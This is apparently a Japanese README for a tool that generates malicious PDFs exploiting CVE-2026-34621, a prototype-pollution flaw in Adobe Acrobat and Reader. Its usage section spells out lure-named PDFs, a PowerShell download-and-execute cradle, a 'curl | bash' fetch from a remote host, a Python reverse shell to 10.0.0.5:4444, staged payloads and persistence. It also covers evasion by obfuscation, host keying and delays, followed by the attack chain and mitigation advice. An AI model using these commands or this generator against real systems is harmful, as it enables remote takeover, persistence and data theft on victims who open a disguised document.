
高度なクロスプラットフォーム対応のエクスプロイトジェネレーター **CVE-2026-34621** 用 – Adobe Acrobat および Reader における重大なプロトタイプ汚染の脆弱性で、Windows と macOS 上でサンドボックスエスケープと任意のコード実行につながります。
CVE-2026-34621 向けの高度なクロスプラットフォームエクスプロイトジェネレーターです。これはAdobe AcrobatおよびReaderにおける重大なプロトタイプ汚染(prototype pollution)の脆弱性であり、WindowsおよびmacOS上でのサンドボックスエスケープと任意のコード実行につながります。
⚠️ 重要なお知らせ
このツールは認可されたセキュリティ研究およびペネトレーションテストのみを目的としています。
所有していない、または明示的な書面によるテスト許可を得ていないシステムに対する不正使用は違法です。作者は誤用に対する一切の責任を負いません。
CVE-2026-34621 はAdobe AcrobatおよびReaderにおけるゼロデイ脆弱性であり、攻撃者が以下を実行できるようにします:
このジェネレーターは、脆弱性のあるバージョンのAdobe Readerで開かれると、被害者のオペレーティングシステムに合わせたペイロードを自動的に実行する悪意のあるPDFファイルを作成します。
対応ターゲットプラットフォーム:
| カテゴリ | 機能 |
|---|---|
| クロスプラットフォームペイロード | OSを自動検出し、適切なWindowsまたはmacOSのコマンド実行方法を選択します。 |
| 複数の実行ベクター | cmd.exe、PowerShell、WScript.Shell(Windows)/ Terminal.app、osascript(macOS)。 |
| ステージ型ペイロード | リモートURLからセカンドステージペイロードをダウンロードして実行します。 |
| 永続化 | レジストリのRunキー(Windows)またはLaunchAgent(macOS)をインストールします。 |
| 回避技術 | 3レベルのJavaScript難読化、環境キーイング、実行遅延、ポリモーフィックコード。 |
| ルアーPDF埋め込み | 正当なPDFにエクスプロイトをマージします(PyPDF2が必要)。 |
| 複数のトリガー | OpenAction、ページオープンアクション、またはドキュメントレベルのJavaScript。 |
| 包括的なレポート | ペイロード設定を詳述するHTML、TXT、JSONレポート。 |
git clone https://github.com/NULL200OK/CVE-2026-34621-Exploit.git
cd CVE-2026-34621-Exploit
python3 -m venv venv
source venv/bin/activate # Linux/macOS
venv\Scripts\activate # Windows
コアスクリプトはPython標準ライブラリのみを使用します。ルアーPDFマージ機能にはPyPDF2をインストールしてください:
pip install PyPDF2
WindowsとmacOSの両方で電卓を開く基本的なPDFを生成します:
python3 cve_2026_34621_advanced.py -o test.pdf
これにより以下が作成されます:
test.pdf – 悪意のあるPDFファイル。
test_report.html – 詳細なHTMLレポート。
test_report.txt – プレーンテキストの要約。
test_config.json – JSON設定のエクスポート。
Windowsコマンド
1-シナリオ コマンド
A-基本的なcalc.exeポップアップ
python cve_2026_34621_advanced.py -o invoice.pdf --win calc.exe
PowerShellリバースシェル
python cve_2026_34621_advanced.py -o contract.pdf --win "powershell -NoP -Ep Bypass -C \"IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/shell.ps1')\""
永続化付きステージ型ペイロード
python cve_2026_34621_advanced.py -o resume.pdf --win calc.exe --stage http://192.168.1.100/payload.exe -p
環境キーイング(「SALES-PC」でのみ実行)
python cve_2026_34621_advanced.py -o targeted.pdf --win calc.exe -k SALES-PC
難読化レベル2と10秒の遅延付き
python cve_2026_34621_advanced.py -o delayed.pdf --win calc.exe -O 2 -d 10
macOSコマンド
2-シナリオ コマンド
電卓を開く
python cve_2026_34621_advanced.py -o invoice.pdf --mac "open /System/Applications/Calculator.app"
スクリプトのダウンロードと実行
python cve_2026_34621_advanced.py -o update.pdf --mac "curl -s http://10.0.0.5/mac_payload.sh | bash"
Pythonによるリバースシェル
python cve_2026_34621_advanced.py -o shell.pdf --mac "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"
LaunchAgentによる永続化
python cve_2026_34621_advanced.py -o persist.pdf --mac "open /Applications/Calculator.app" -p
ルアーPDFへの埋め込み
python cve_2026_34621_advanced.py -o safe_invoice.pdf -l /path/to/real_invoice.pdf --trigger pageopen
3-モバイルテストに関する注意
スクリプト自体はデスクトップ(Windows/macOS/Linux)上で実行され、PDFを生成します。生成されたPDFはAndroidまたはiOSデバイスで開くことができますが、以下の点に注意してください:
モバイル版のAdobe Acrobat ReaderはCVE-2026-34621の影響を受けません。
ペイロードはシステムコマンドを実行する代わりに、無害なデモ用フォールバック(URLを開くかアラートを表示)をトリガーします。
オプション 説明
-o, --output FILE 必須。出力PDFファイル名。
--win CMD 実行するWindowsコマンド(デフォルト:calc.exe)。
--mac CMD 実行するmacOSコマンド(デフォルト:open /System/Applications/Calculator.app)。
--stage URL セカンドステージペイロードをダウンロードするURL。
-p, --persistence 永続化メカニズム(レジストリ/LanchAgent)をインストールします。
-O, --obfuscate LEVEL JavaScript難読化レベル(0=なし、1=基本、2=中級、3=上級)。
-d, --delay SECONDS 指定した秒数だけ実行を遅延します。
-k, --key HOSTNAME 環境キーイング – 一致するホスト名でのみ実行します。
-l, --lure PDF ルアーとして使用する正当なPDFへのパス(エクスプロイトをマージします)。
--trigger TYPE トリガーベクター:openaction、pageopen、またはdoclevel。
--no-reports HTML/TXT/JSONレポートの生成をスキップします。
--seed N 再現可能なポリモーフィック生成のための乱数シードを設定します。
攻撃チェーン
プロトタイプ汚染:
埋め込まれたJavaScriptはObject.prototypeを変更して悪意のあるプロパティ(__trusted、privilegedなど)を注入します。これによりAdobeのJavaScriptエンジンの信頼境界が混乱します。
コンテキスト昇格
汚染されたプロトタイプにより、エンジンは信頼されていないドキュメントJavaScriptを特権コンテキストで実行されているかのように誤って扱います。
特権APIアクセス
スクリプトはapp.launchURL、util.readFileIntoStream、app.trustedFunctionなどの制限付きAPIを呼び出せるようになります。
サンドボックスエスケープ
これらのAPIにより、Adobeサンドボックスの外部でのファイルシステムアクセスとプロセス実行が可能になります。
任意コード実行
スクリプトはOS固有の方法を使用して攻撃者のコマンドを実行します:
Windows:cmd.exe /c、PowerShell、またはWScript.Shell。
macOS:Terminal.app URLハンドラーまたはosascript。
難読化レベル
レベル 説明
0 難読化なし – プレーンで読み取り可能なJavaScript。
1 文字列リテラルがString.fromCharCodeに変換され、変数名がランダム化されます。
2 レベル1 + デッドコードの注入とジャンクコメント。
3 スクリプト全体がbase64エンコードされ、eval(atob(...))でラップされた後、再難読化されます。
製品 トラック 影響を受けるバージョン 修正済みバージョン
Adobe Acrobat DC 継続 ≤ 26.001.21367 26.001.21411
Adobe Acrobat Reader DC 継続 ≤ 26.001.21367 26.001.21411
Adobe Acrobat 2024 クラシック ≤ 24.001.30356 24.001.30362(Win)/ 24.001.30360(macOS)
すぐに更新する:Adobeから最新のセキュリティアップデートを適用してください。
Adobe ReaderでJavaScriptを無効にする:編集 → 環境設定 → JavaScript → 「Acrobat JavaScriptを使用」のチェックを外します(注:一部のPDF機能が使用できなくなります)。
代替PDFビューアを使用する:影響を受けないブラウザやサードパーティ製ビューアの使用を検討してください。
貢献は歓迎しますが、以下の点にご注意ください:
すべてのプルリクエストは、防御的研究、検出の改善、またはレポート機能の強化を目的としたものでなければなりません。
正当なテストに必要な範囲を超えてツールの攻撃能力を高める貢献は受け付けません。
貢献するには:
リポジトリをフォークします。
機能ブランチを作成します。
変更内容を明確に説明したプルリクエストを送信します。
このプロジェクトは教育目的および認可されたセキュリティテスト目的でのみ提供されます。
本ソフトウェアを使用することにより、お客様は適用されるすべての法律および規制を遵守する責任があることに同意したものとみなされます。
作者は、このツールの誤用または損害に対する一切の責任を否認します。